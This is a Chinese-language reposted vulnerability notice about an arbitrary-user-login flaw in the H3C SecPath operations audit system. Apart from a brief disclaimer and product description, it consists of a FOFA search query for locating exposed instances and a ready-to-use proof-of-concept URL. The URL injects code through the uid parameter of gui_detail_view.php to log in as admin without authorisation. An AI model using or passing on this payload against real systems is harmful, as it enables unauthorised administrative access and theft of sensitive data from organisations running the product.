本文转载于公众号:融云攻防实验室,原文地址:
H3C SecPath运维审计系统 任意用户登录漏洞
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
H3C SecPath运维审计系统是基于用户现阶段面临的运维难题提出的一款运维风险管控产品。借助身份认证、权限控制、操作审计等功能,从操作层面解决了企业现存的IT内控与管理问题,使运维操作管理进入安全与便利相结合的阶段,帮助客户提高整体运维安全水平,使运维操作管理过程变得更加简单、安全、有效。H3C SecPath运维审计系统存在任意用户登录漏洞,攻击者通过漏洞可以未授权登录系统管理员,导致敏感信息被窃取等问题。
![图片[1]-H3C SecPath运维审计系统 任意用户登录漏洞-安全小天地](https://img.godyu.com/2023/12/20231226124959770.png?imageView2/0/format/webp/q/75)
0x03 漏洞复现
fofa:“H3C SecPath运维审计系统”
1.执行POC可未授权登录系统
https://{{Hostname}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin![图片[2]-H3C SecPath运维审计系统 任意用户登录漏洞-安全小天地](https://img.godyu.com/2023/12/20231226205001355.png?imageView2/0/format/webp/q/75)
THE END
暂无评论内容